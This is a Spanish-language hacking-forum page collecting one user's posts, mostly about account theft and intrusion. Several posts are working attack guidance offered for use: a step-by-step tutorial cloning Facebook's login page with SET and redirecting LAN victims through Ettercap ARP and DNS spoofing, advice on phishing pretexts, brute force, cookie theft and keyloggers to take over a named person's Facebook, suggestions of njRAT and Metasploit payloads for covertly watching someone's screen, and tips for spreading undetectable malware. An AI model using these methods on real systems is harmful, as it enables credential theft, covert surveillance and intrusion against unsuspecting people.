Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - NuMB3RW4N

#1
Hacking / Hackeando Facebook con Set & Ettercap
Septiembre 20, 2016, 03:15:22 AM
SET


¿Que es SET?
SET es una completísima suite dedicada a la ingeniería social , que nos permite automatizar tareas que van desde el de envío de SMS (mensajes de texto) falsos, con los que podemos suplantar el numero telefónico que envía el mensaje, a clonar cualquier pagina web y poner en marcha un servidor para hacer phishing en cuestión de segundos. SET integra muchas de las funciones de Metasploit, es más, muchas de las funciones de SET las saca de Metasploit, por tanto no se concibe SET sin previamente tener instalado Metasploit. Quizás lo que mas nos ha llamado la atención de SET es su eficacia y agilidad a la hora de implementar su gran variedad de ataques... SET esta disponible en el BackTrack Linux y Kali Linux o puedes instalarlo desde su repositorio en git.



"git clone No tienes permitido ver enlaces. Registrate o Entra a tu cuenta"



Ettercap


Ettercap es un interceptor/sniffer/registrador para LANs con switch. Soporta direcciones activas y pasivas de varios protocolos (incluso aquellos cifrados, como SSH y HTTPS). También hace posible la inyección de datos en una conexión establecida y filtrado al vuelo aun manteniendo la conexión sincronizada gracias a su poder para establecer un Ataque Man-inthe-middle(Spoofing).
Muchos modos de sniffing fueron implementados para darnos un conjunto de herramientas poderoso y completo de sniffing. La instalacion dependen de tu SO





Requisitos:
Unos cigarros
Una Coca Cola
Estar conectado a la red de la vicitma (Wardriving)


Terminal
Una vez que estamos ya conectados a la red de nuestro target o víctima ejecutamos set (comando para OSX) , posicionados en la carpeta de instalación de SET





Comando :
Código: text
Makuaz@mbp-de-juan /opt/set ][ 05:41:14 ] > sudo ./setoolkit

Y obtendremos una pantalla como esta :
Escogemos la opción 1




Ahora escogemos la opción 2 :
Y se nos lanza esta pantalla :




Ahora se muestra en pantalla la siguiente información con opciones :
Ahora escogemos la opción 3 :




Ahora escogemos la opción 2 :




Como dije anteriormente Seteamos la información solicitada:
Código: text
set:webattack> IP address for the POST back in Harvester/Tabnabbing:

Recomiendo tu ip local
Enter the url to clone: Aqui la URL : No tienes permitido ver enlaces. Registrate o Entra a tu cuenta:

Finalmente obtendras una pantalla similar a esta :




Ahora revisas tu localhost y deberías de ver algo así:
Sin el error claro





Ahora vamos con Ettercap
Suponiendo que ya lo tienes instalado vamos a configurarlo :
La ruta de instalación depende de tu SO , en mi mac es la siguiente: /usr/local/etc/ettercap





Ahora modificaremos el archivo etter.dns con NANO y agregamos estas lineas :
www.facebook.com A 192.168.1.124 — Esta ip es de mi mac donde esta corriendo SET





Salvamos el archivo y ahora corremos el siguiente comando:
Código: text
sudo ettercap -Tq -i en1 -P dns_spoof -M arp // //

Donde en1 es mi tarjeta de red , la tuya puede ser wlan0 , eth0 ... etc




Ahora veremos una pantalla similar a esta




Ahora encenderé una maquina virtual con windows XP SP3 , la cual imaginemos que es una pc mas en la red (debe estar en modo Bridge).
Vemos como en la consola de ettercap aparace la maquina virtual





La cual Verificamos en la misma maquina con windows mediante el comando mundialmente famoso "ipconfig"




Ya en la maquina virtual abrimos Chrome ,Firefox ,o el navegador que tu uses y escribimos No tienes permitido ver enlaces. Registrate o Entra a tu cuenta .




Ahora vemos como ettercap toma la petición y hace referencia a mi prestada MackbookPro




Ahora revisamos el SET y vemos resultados!





Espero que te sirva y le des uso , recuerda comparte los contenidos para que mas
gente aprenda y pueda protegerse.


#2
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Hola mi duda es la siguiente  hay algún método o algún programa que me permite conocer la ip de las  redes wifi que tengo  cercanas , no hablo de mi red wifi si no de las redes externas , y que no sea necesario crackear la red sino solo quiero obtener la ip , espero haberme explicado , saludos y espero me ayuden .

No entendi muy bien para la proxima te recomiendo formular mejor tu pregunta para que los mienbros de underc0de se te le haga mas facil  entenderte    pero creo que lo que deseas  saber

Pero aclarando un tema  existen 2 direcciones de ip distinta la que nos da el isp "es decir el que nos da el servicio de internet" denominada ip Publica y la otra es la Ip Interna  que seria la que da el router ah una red interna

en fin puedes montar paginas para que la persona acceda  oh usar programas  y odtener su ip pero creo no estoy muy seguro que siempre odtendras es la ip publica que no te servira para nada  creo que la unica manera de que tengas una ip privada  seria que pueda ingresar ala red ya como  dije  anteriormente es la que  da el router alos dispositivo  internos

Cada elemento de la red tendrá su propia IP. Por ejemplo,

  • 192.168.1.1 (el router)
  • 192.168.1.2 (el PC fijo)
  • 192.168.1.3 (el laptop)
  • 192.168.1.50 (la impresora en red)


Saludos
Numb3r
El conocimiento es poder y el poder trae responsabilidad 8)
#3
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Hola amigos!
Tengo una duda, Ayer olvidé el pin de mi ipad,entonces ya no pudel loguearme con huella ni nada. Procedí al hard reset, ahora bien.
Durante el setup me pide que me loguee con mi cuenta de icloud que fue usada para configurar por primera vez el ipad.
Sucede que me pide una cuenta en formato ****@icloud.com el asunto es que mi apple id usa un correo ****@No tienes permitido ver enlaces. Registrate o Entra a tu cuenta.com
al loguear con el apple id y contraseña de apple id actuales , no me deja loguear (me dice que no se puede usar) y sigue pidiendo la cuenta @icloud.com, la cual conozco, pero no me deja usar la contraseña actual del apple id.

En fin,llevo 2 días leyendo en foros de apple support y nada,la verdad no tengo un centro de soporte cerga y será difícil aceptar que perderé mi inversión, pues la compre nueva en amazon ;(

Equipo: ipad air 2, versión IOS: 9.3

Muchas gracias,desde ya , por sus sugerencias y ayuda

No conosco mucho del tema pero haz intentado logearte por la web y modificar tus  datos  te podria ayudar  oh intenta acceder desde otro tlf oh tablet atu cuenta y modificarla para ver si te el resultado seria diferente
#4
Noticias Informáticas / Re:Phishing Web: a puro clic
Septiembre 13, 2016, 02:11:06 AM
hola gabriela  ;D oye le estuve revisando tu post y la curiosidad me mato y entre a la pagina la cual es muy sencilla  y te enseña como usarla pero algo que estoy viendo  es que es detectada por el sistema de google chrome igual que  mozilla firefox  aparte de que la victima  tiene que aceptar que esta corriendo el riesgo la pagina aparece rusa  ;D ;D lo cual veo que ninguna victima se  va ah comer este phishing

Entrando en la pagina

Accediendo a la pagina


Ay muchos modelos de falsificaciones etc pero en verdad las que pasan el sistema de google  son los vip que para estos se necesitar pagar y aparte nunca vi donde se podia modificar el idioma  :D
@No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#5
por que no restauras el sistema aun punto de punto de restauracion donde no presentaba ese problema pienso yo que es la salida mas facil y basica
#6
Debates, Reviews y Opiniones / Ideas para proyectos
Septiembre 04, 2016, 01:09:57 PM
Hola como están todos  ;D espero que bien

bueno hermanos este debate mas que todo es personal  ya que me gustaría sus ideas les planteare el tema

Estoy en el 5to semestre de informática y tengo que presentar mi proyecto final, proyecto de grado,  como ustedes lo quieran llamar
bueno, no quiero hacer algo simple como una programación básica como la de mis compañeros  que vendría siendo esto:

  • sistema de inventario y venta
  • sitema de control de pago para trabajadores
  • sistema de facturación



No quiero nada relacionado a este tipo de programación por que es algo muy sencillo y quiero que me ofrezcan ideas nuevas
interesante algo que tenga que ver con la seguridad informática; sus ideas se anotaran y se llevara a una breve investigación y
publicare que idea tomare  y  después que presente el proyecto lo publicare en underc0de para  que muchas persona puedan aprender
algo nuevo bueno muchachos sin mas que decir



Ideas que se están tomando en cuenta hasta ahora
  • Integración de Latch en frameworks de Internet con Segundo Factor de Autenticación
Latch es una tecnología que se puede utilizar como Segundo Factor de Autenticación en frameworks de Internet. Nosotros desde Eleven Paths lo hemos integrado en un montón de ellos, como PrestaShop, WordPress, PHPMyAdmin, PHPBB, Open X-Change, OpenLDAP o RoundCube, pero aún quedan un montón de ellos que no hemos podido integrar. Todos esos plugins son Open Source, así que puedes ver el código fuente de cada uno de ellos y entender cómo se integra un 2FA en cada uno de ellos. Además, para que sea mucho más fácil de entender cómo se hace, hemos escrito un artículo en el que se detallan todos los cambios que se hacen por debajo a WordPress cuando se integra Latch.
  • Evaluación de fugas de datos en sitios web por medio de documentos públicos
Este es un proyecto de investigación sencillo, que nosotros ya hemos hecho con empresas del IBEX 35 y en las webs de los líderes en DLP. La idea es evaluar qué cantidad de fugas de datos se producen en sitios en los que no debieran producirse. Para ello, elegir un sector de estudio como banca, administraciones públicas de tu país, empresas de una determinada industria, etcétera, podrían arrojar datos significativos. Los riesgos de los metadatos son muchos, y yo tengo ya más de treinta ejemplos de por qué los metadatos hay que cuidarlos.
  • Detector de casas vacías
Una de las cosas que más me sorprende es que se pueda hacer es ver a través de muros utilizando tecnología WiFi. Hemos visto que incluso se puede monitorizar los latidos y la respiración de un bebé. ¿Se podría hacer un sistema que detectara si una casa está vacía utilizando un escáner WiFi? Yo creo que sí, y sería importante poder alertar del riesgo.
  • Configurador remoto de apertura y cierre de puertos en un firewall con Latch
Usar Latch permite muchos esquemas distintos, como Verificación en 4 ojos, Control Parental, Supervisión o como hicieron en HackPlayers, Activación con 2 llaves. ¿Qué tal hacer un daemon que monitorice cada 5 minutos si los puertos de un firewall deben estar abiertos o cerrados y configurar tu iptables? Así, el usuario desde su app puede abrir o cerrar en todo momento qué puertos quiere tener activos y cuáles no.

Estas ideas provienen del Blog de Chema Alonso " El Lado Del Mal"

Espero que me contribuyan con mas ideas o apoyen me en alguno de los proyectos

Saludos
Numb3r
#7
Dudas y pedidos generales / Re:Escáner de vulnerabilidades
Septiembre 03, 2016, 11:23:57 AM
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
No a nivel de aplicaciones me refería a las vulnerabilidades que tuvieran programas instaladas en mi sistema como sñpor ejemplo VideoLAN o cualquier otra aplicación que tuviera en mi equipo que por culpa de esa vulnerabilidad en esa aplicación me pudieran explotarla

Hola que tal

por la aplicación no pueden tener vulnerabilidad ni lo pueden explotar
amenos que la aplicación haya sido modificado y haya  código malicioso
por eso es recomendable utilizar aplicaciones descargar de la pagina de su autores,creadores,desarrolladores
para evitar este tipo de situaciones y no nadie puede tener explotar oh dañar tu pc
mediante aplicaciones que tengas  osea no tiene sentido
en cambio si descargas  programas de paginas piratas "cualquier blog oh cosas asi"
tu corres el riesgo de que  este infectado con un troyano,código malicioso,gusano
pero normalmente casi no pasa eso

Te recomiendo que te descarges un buen antivirus en version paga que dejes la paranoia con las aplicaciones
@No tienes permitido ver enlaces. Registrate o Entra a tu cuenta


No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Puedes descargartelos en una maquina virtual y con injenieria inversa compruebas el codigo o comprobando las conexiones que hace
Tu cres que una persona normal  se pondrá ah  revisar cada programa que descargar no tendría sentido
te apoyo en lo de la maquina virtual pero mayormente los malwares tienen un bajo perfil
y van haciendo daño de poco ah poco nunca vas obtener un resultado al instante
amenos que sea un malware muy malintencionado que 90% de los caso el antivirus lo detecta al instante
amenos que su administrador haya desactivado el anti virus ay queda ah consecuencia de el



Saludos
NumB3r


Hola NuMB3RW4N debo de decepcionarte un poco con respecto a esta frase en concreto:

Hola que tal

por la aplicación no pueden tener vulnerabilidad ni lo pueden explotar

Cualquier programa es explotable  sólo que hay que encontrar en donde está el bug, a mí me encantaría aprender sobre esto pero es bastante  complicado
en el sentido que hay que tener muchisímos conocimientos.

Por lo que leí hace bastante tiempo sobre un usuario llamado creo oXsocket o algo así lo primero que se hace es buscar un fallo  que  haga saltar el buffer de
la pila de memoria, una vez encontrado este fallo se genera un shellcode para que envíe, ejecute ciertas cosas en un espacio de memoria y por ejemplo nos devuelva un shell de acceso.

La verdad es que te lo he resumido en tres lineas pero el post para mí cuando lo leí, fue muy didáctico y extenso.

Con respecto al usuario que pregunta si existen programas para detectar este tipo de bugs en los programas, pues yo desconozco que los haya, también hay que partir de la base  que  la persona que cree un exploit de estas características  se consideran 0 days.

Es de suponer que quien haga algo de esto así por ejemplo en el reproductor de windows crear un exploit remoto, pues lo venda a un precio desorbitado y no  exista nada para frenarlo hasta  que  se parchee esa vulnerabilidad.

Saludos








Gracias por tu correcciones como quien dice de los errores se aprende
que tengas buen dia 
#8
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Donde se guardan las contraseñas de windows,he estado investigando y se que se llama sam,pero no se donde se ubica y como copiar las contraseñas con un script en batch

Las contraseñas se guardan en la SAM que esta esta ubicada en:

c:/windows/system32/config/SAM
o
c:/winnt/system32/config/SAM

Para poder modificar este fichero es necesario entrar desde otro sistema operativo, por ejemplo desde un knoppix.



Saludos
Numb3r
#9
Presentaciones y cumpleaños / Re:Hola, buenas
Septiembre 03, 2016, 09:17:15 AM
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Hola a todos, esta es la primera vez en mi vida que saludo en un foro por ser nuevo. Llevo buscando una fuente de conocimiento decente y activa bastante tiempo y este foro me ha dado buena espina. Desde siempre me ha interesado la tecnología y el tema de la seguridad informática y hacking, pero hasta ahora no he podido comenzar. Llevo algunos meses leyendo de todo por internet sobre programación y hacking, y he logrado aprender lo básico de C++. Espero poder ampliar mis conocimientos aquí, me encanta aprender. Gracias :D

hola que tal bienvenido ah underc0de espero que sea de tu agrado espero que tu estadia en la comunidad sea larga
cualquier cosa oh duda puede enviarme un mp " mensaje privado " y yo te ayudo

por cierto que libros haz leído referente ah progamacion y hacking
#10
Presentaciones y cumpleaños / Re:Presentándome desde Arg
Septiembre 03, 2016, 09:13:48 AM
hola que tal  ;) bienvenido ah underc0de espero que sea de tu agrado
espero que sea larga tu estadia y contribuyas con la comunidad con unos buenos post
cualquier cosa oh duda puede enviarme un mp no queda mas nada que decir que
Bienvenido ah Underc0de


Saludos
Numb3r
#11
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Yo hace un par de años solía visitar la deep web ya verdad es que aparte de lo que ya sabemos de pornografia y demás solo encontré manuales absurdos de como hacer cosas("como ganar una pelea",  "como robar un coche"). Y relacionado con temas de seguridad informática y demás en la deep web hay muchos libros y manuales totalmente desfasados de 1997 y cosas así que en este momento son un poco inútiles.

estas equivocado querido compañero deep weeb como la surfaces son grandes biblotecas actualizadas mayormente
solo que en la deep web mayormente se encuentra libros que su venta a sido prohibida por cualquiera causa
estos libros vienen a parar en librerias exclusivas que son aveces dificil de encontrar

te dire algo en la deep web puedes encontrar 90% de libros gratis que en la surface " internet normal"
no la encontraras  solamente en pago  pero que para estos tienes que aprender a navegar y hacer amistades
en esa red oscura  y puedes encontrar de todo desde conocimiento para seguridad informatica hasta archivos de seguridad
de paises en venta


Saludos
Numb3r
Gracias por comentar @No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#12
Dudas y pedidos generales / Re:Escáner de vulnerabilidades
Septiembre 03, 2016, 08:45:18 AM
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
No a nivel de aplicaciones me refería a las vulnerabilidades que tuvieran programas instaladas en mi sistema como sñpor ejemplo VideoLAN o cualquier otra aplicación que tuviera en mi equipo que por culpa de esa vulnerabilidad en esa aplicación me pudieran explotarla

Hola que tal

por la aplicación no pueden tener vulnerabilidad ni lo pueden explotar
amenos que la aplicación haya sido modificado y haya  código malicioso
por eso es recomendable utilizar aplicaciones descargar de la pagina de su autores,creadores,desarrolladores
para evitar este tipo de situaciones y no nadie puede tener explotar oh dañar tu pc
mediante aplicaciones que tengas  osea no tiene sentido
en cambio si descargas  programas de paginas piratas "cualquier blog oh cosas asi"
tu corres el riesgo de que  este infectado con un troyano,código malicioso,gusano
pero normalmente casi no pasa eso

Te recomiendo que te descarges un buen antivirus en version paga que dejes la paranoia con las aplicaciones
@No tienes permitido ver enlaces. Registrate o Entra a tu cuenta


No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Puedes descargartelos en una maquina virtual y con injenieria inversa compruebas el codigo o comprobando las conexiones que hace
Tu cres que una persona normal  se pondrá ah  revisar cada programa que descargar no tendría sentido
te apoyo en lo de la maquina virtual pero mayormente los malwares tienen un bajo perfil
y van haciendo daño de poco ah poco nunca vas obtener un resultado al instante
amenos que sea un malware muy malintencionado que 90% de los caso el antivirus lo detecta al instante
amenos que su administrador haya desactivado el anti virus ay queda ah consecuencia de el



Saludos
NumB3r
#13
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Mil Gracias, pero lo que quiero en si no es infectar, unicamente necesito un software de paga o no paga que haga lo siguiente.

Visualizar totalmente lo que la persona hace en tiempo real y grabando como transmisión en vivo de la pantalla de la lapto y recepcionando y grabando como video, osea necesito algo que grave de manera remota lo que se ve en la pantalla de la laptop por medio de otra lapto visualizar y grabar.

no se si me doy a entender.

Bueno compañero esto fue lo que se me ocurrio

creo que si no estoy equivocado en team vierew trae opciones para grabar  en version paga claro
oh tambien algo que se me ocurrio que descarges  un progama para grabar atu pc 
y pones en pantalla completa el team vierew y asi graba lo que esta haciendo en la laptop
nose si me doy ah entender

lo que quiero decirte es que desde tu pc habras el team vierew lo conectes ala laptop " si sale la opcion de grabar pantalla le das click"
si no descarga un progama que usan para hacer tutoriales como camtasia y esos software  y pones en pantalla completa y empiezas ah grabar lo que hace
espero que te haya ayudado un poco

Saludos
Numb3r
#14
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Buenos Días Underneanos.

Necesito un Software de Paga o no Paga, del Cual necesito ver de manera remota y en tiempo real todo lo que hacen en una Lapto, osea necesito ver y grabar de manera remota lo que esta sucediendo en la pantalla de la lapto como que fuera un video, y poderla visualizar de otra lapto en tiempo real y grabar al mismo tiempo lo que sucede en la lapto.

Necesito sus aportes se los agradeceria.

Atte.

Nitro_x_net.
 
hola como estas amigo,espero que bien bueno aqui mi respuesta
depende para que lo necesitas si es para infectar una victima oh mantener el control de una pc


  • team vierew trae unas opciones para que inicies control remoto sin avisar ala otra computadora de su uso
  • [nj Rat tengo entendido que es un malware tiene una conexion remota para transmitir  en vivo lo que sucede en otra pc infectada igual que su manejo totalmente del sistema
  • los keyloggers ahora envian capturas de pantalla  puede momentaneo osea cada 2 min oh 3 depende de tu exigencias y llega atu correo por smtp
  • metasploit  bueno si quieres ver que hace oh en donde navega tu victima con un buen payload creo que te serviria mucho


Saludo @No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Numb3r
#15
Hacking / Re:Email Spoofing
Agosto 29, 2016, 12:08:41 AM
Interesante lo revisare y luego te dare mi comentario hasta ahora me parece muy bueno tu post llama mucho la atencion

Saludos
Numb3r
#16
Presentaciones y cumpleaños / Re:¡Buenas!
Agosto 28, 2016, 12:49:11 PM
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Buenas tardes, noches... lo que sea. Me presentaré, soy de españa, estudio ingeniería informática y mi objetivo es terminar siendo auditor de seguridad. Además de eso tengo otro tipo de proyectos para los que necesito primero aprender, y donde mejor que en un foro dedicado a la seguridad informática y hacking.
Así que este no va a ser mi ultimo post, si no que espero estar mucho tiempo aprendiendo, y enseñando todo lo que yo sepa.
Un saludo.

PD: voy a configurarme la cuenta y demás jajaja

hola hermano bienvenido al foro espero que tu estadia sea larga 
cualquier cosa oh ayuda de como comenzar en el foro y integrarte  puedes contactarme al mp "mensaje privado"
espero que disfrutes mucho del foro que pases un buen dia me despido


saludos
Numb3r


El conocimiento y humilda es la base de una gran persona
#17
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Hola! Simplemente quería que me explicaran cuales son los métodos mas utilizados y mas eficaces para propagar un virus en el 2016. Gracias y saludos!

que sea indectectable principalmente  luego que tu progama , malware ,  como lo quieras llamar sea llamativo

mira uno de los virus mas propagados horita son los keyloggers la gente cree que son hackers gracias ah ellos pero lo que no saben es que al fondo
de ese progama ay codigos maliciosos incluso el antivirus lo detecta pero mucho lo agregan ah excepciones solo por el buen trabajo de ing social que le hizo el youtubers la publicidad del producto osea de donde venga
#18
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Hola, buenos días a todos.

He visto que en la mayoría de los posts para hackear facebook sólo hay métodos de pishing o relacionados, muchos no caen en ésta trampa, y necesito saber si hay algún otro método que no precise hablarle a la víctima.

Si pueden mandarme el link de algún post de lo anteriormente hablado, les agradecería mucho.

Saludos, Skr01llZ

Hola buenas, Yo eh conseguido muchos facebooks por gusto pero todavia no conosco la forma  magica asi como tu la quieres
te explicare facebook tiene un modulo de seguridad muy alto lo cual te sera casi imposible que filtres informacion de la bd
creo que ya viste que es phishing. Apuesto que no lo supiste utilizar muy bien por esa tecnica es algo imprensidible  te dare una idea



  • phishing :dile atu amiga que tu prima esta participando en un concurso de belleza dile incluso que le pagaras si le da su votacion con un comentario
    para poder comentar en dicha pagina tiene que registrarse  ay odtendras el correo y la clave mayormente la personas usan una clave por default
    osea usa una para todo y odtendrias toda la informacion
  • ingeneria social el arte del engaño : ya que no quieres hablar con la victima eliminemos este metodo
  • forze brute : en tu caso algo muy poco servible del 100% creo que te funcionara un 20% si acaso tienes un buen diccionario  esto se usa muy poco
    para atacar ah redes sociales y muy poca veces odetienes un valor que te sirva
  • hombre en medio : si tienes acesso a su red wifi  puedes ver los paquetes de datos que se envian  y robar cokies
  • exploit: puedes enviar un exploit camuflajeado  para tener un control remoto de su pc
  • la forma mas facil es un keylogger , aunque normalmente los keyloggers no son de buenas   intenciones y que tambien infecta  tu pc
    normalmente te recomiendo  que lo hagas tu mismo

Algo muy importante se me olvido decir  investiga atu victima para tener  una mayor posibilidad  de conseguir su facebook 
y si quieres un link aqui te dejare una fuerza bruta que segun esta dando mucho de que hablar
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Se le aplica fuerza bruta al  sistema de verificacion para cambiar contraseña este metodo a dado mucho de que hablar

Saludos
Numb3r
el mejor conocimiento se adquiere con experiencia
#19
Echemos un vistazo alas herramientas usadas en la serie mr robot


Mr robot ha sido un gran serie para los amantes  de la cyber seguridad esta serie trato de reflejar
lo mas realista posible su situaciones incluso algunas herramienta verdaderas sirvieron para este film
para mi personalmente me encanto investigue sobre sus herramientas de uso y las pude encontrar
dejare un breve hipnosis de la  serie y explicare sus herramientas

Sinopsis
La serie sigue a Elliot (Rami Malek), un joven hacker que sufre de fobia social, depresión clínica y delirios, trabaja como ingeniero de seguridad informática y usa sus habilidades para proteger a las personas por las que se preocupa. Elliot es reclutado por Mr. Robot (Christian Slater), el misterioso líder de un grupo de hackers que quiere destruir a poderosos empresarios de multinacionales que están manejando el mundo.

Bueno empezamos Muchachos
Herramientas:

kali linux: Si por supuesto nuestro hermoso y adorado kali se utilizo en este film ya que dicho sistema operativo
especialmente diseñado para profesionales de seguridad/pentesting/analistas, es de código abierto y de uso gratuito, junto con sus herramientas (hacking).

Social Engineering Toolkit (SET):SET es una completísima suite dedicada a la ingeniería social , que nos permite automatizar tareas que van desde el de envío de SMS (mensajes de texto) falsos, con los que podemos suplantar el numero telefónico que envía el mensaje, a clonar cualquier pagina web y poner en marcha un servidor para hacer phishing en cuestión de segundos.
links : No tienes permitido ver enlaces. Registrate o Entra a tu cuenta


Netscape Navigator: Probablemente ningún hacker utiliza ese navegador web. Sin embargo, sirve como un recuerdo de cómo Elliot comenzó en el hacking y expresa el compromiso de la serie de ofrecer verdadero conocimiento e información!
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Bluetooth Scanner
: El Bluetooth Scanner (o btscanner) se utiliza para extraer la información de un teléfono a través de su Bluetooth, incluso sin la necesidad de estar vinculados para la completar la extracción.
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta


John the Ripper, un clásico entre los clásicos para realizar la rutinaria tarea de crackear contraseñas protegidas por todo tipo de cifrados utilizando diccionarios, listas de palabras y otras técnicas.


Wifite: Es un script en Python para automatizar el wifi hacking usando varias herramientas como Aircrack-ng suite y Reaver para los routers compatibles con WPS. Esta script automatiza todas las tareas que harías manualmente usando aircrack y reaver. Es necesaria una distribución Linux con los controladores inalámbricos parchados para inyección y acceso root para que funcione.
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta


Wget: Wget es un programa informático que se ha utilizado para comprometer servidores web e interceptar datos sensibles. Basado en la vulnerabilidad shellshock, se lleva a cabo el compromiso.

Rapberry  Hackear:
Ahora en Mr.Robot,  Elliot usa una Rapberry Pi para sobrecalentar y quemar las copias de seguridad de Evil Corps (quien no halla visto la serie esto le sonara a chino, sale en el capitulo 4) si no sabéis lo que es un Raspberry Pi es una mini ordenador del tamaño de una tarjeta de crédito



Dispositivos USB: para comprometer una red aislada: Las unidades flash USB se tiran en un estacionamiento, para que el transeúnte sin sospechar los recoja e iniciar el compromiso. Al ser insertado en la computadora, el hack comienza!



Espero que disfruten mi post 
Conocimiento es poder

Fuente: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#20
Análisis y desarrollo de malwares / Re:NanoCore RAT
Agosto 24, 2016, 10:20:35 AM
@No tienes permitido ver enlaces. Registrate o Entra a tu cuenta de casualidad de la vida no podras actualizar el link esta fuera de servicio
y me encuentro muy interesado  :'( :'( :'(

que tengas un buen dia